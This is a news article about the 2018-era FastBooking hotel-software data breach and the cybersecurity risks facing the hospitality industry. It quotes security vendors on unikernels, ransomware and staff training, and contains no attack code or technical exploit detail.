FastBooking, a Paris-based company that sells hotel booking software, was robbed of customers’ personal information and credit card data. The company sent out emails last week warning those affected among its 4,000 customers in 100 countries.
The breach, which took place on June 14, is the latest flare to the hospitality industry to take action. An attacker infiltrated a vulnerability in FastBooking’s software to install malware. That gave the attacker remote access to the company’s server.
Ian Eyber, owner of Nanovms, a company that makes attack-preventing software, says the hospitality industry is at significantly more risk than other industries for data infiltration. Because more than just credit cards numbers are collected from customers, hotel booking data is highly valued.
“Also, much of the traditional means of booking and other hospitality-specific software is moving to newer web-based applications that, while they may be newer, suffer from web application-style vulnerabilities,” Eyber says.
Fastbooking runs its software on the open-source Linux operating system. “I think it’s very common for developers that deploy to Linux systems to think they are ‘secure enough’ from malware, because they aren’t running Windows,” Eyber says. “It might be better, but it still suffers from the same vulnerability of being a multiple-process system—that is, [it can] run multiple programs [at the same time] instead of just the one that should be running.”
A Promised Fix
Eyber says a new technology does addresses the problem. Nanovms sells unikernels applications—as do several other companies—that do not need an operating system, such as Linux or Windows.
Typical software application systems often have “shells”—programming that powers a user interface—that contain codes hackers can use to hijack the system. Or, attackers will infiltrate a system call, the way a computer program orders a computer to perform a certain task.
Unikernels have neither, says Eyber. The technology combines the application and the operating system into one. This makes it nearly impossible for attackers to invade, because other applications, such as malware, have no entry for infiltrating.
“Many remote code-execution attacks rely on the capability of running other ad-hoc commands on the targeted system or downloading new software to be run on that system,” Eyber says.
Hotels Fall Victim
The hotel industry has felt the shockwaves from cyberattacks in recent years. Major chains such as InterContinental Hotels and Hyatt Hotels have fallen victim, resulting in large monetary reparations and the loss of trust from thousands of customers.
Steve Oates is the director of SAVIT group and specializes in IT and cybersecurity. In a recent LinkedIn article, Oates notes that an attack has repercussions beyond financial.
“A breach will erode the confidence in your brand,” Oates said. “Depending on the level of the attack and the extent of the news coverage, your brand can be permanently damaged. After an attack, even if you put the necessary safeguards in place, customers might never know about them. People are willing to forgive a business for being a victim of a crime, but they are less likely to forgive a business for being negligent toward them.”
Solving the Predicament
His prescription? Oates suggested promoting a “culture of security” and educating employees on digital security the same way a company would for physical security. Hiring a chief information security officer (CISO) can also be a positive step toward ensuring continuous surveillance, he says.
Besides credit card attacks, the industry is at risk from other tactics, including ransomware. This attack uses a vulnerability in the system or encrypted files and links to completely lock down devices. The attacker will then demand payment, often in the form of Bitcoin, to relinquish its control. In the meantime, all hotel operations can be frozen. Property managers will not be able to see reservation details, make financial transactions or create electronic keys.
Oates’ article reports that ransomware rose 250 percent in 2017. HospitalityTech.com categorizes the phenomenon as an “industry.” The website advises brands to act quickly by isolating the infected network of devices, then temporarily removing unaffected computers to stop the problem from spreading.
Eyber urges companies to give priority to the security of management systems over convenience of their use.
“Web application software has been for some time eating into traditional desktop-based software environments for lots of good reasons, like centralizing data and making updates easier to apply,” Eyber says. “Unfortunately, if certain precautions are not taken, web applications are just as vulnerable as desktop applications are. A good start is ensuring that only the application that should be running is able to run. It should not be possible to run attackers’ code on your system.”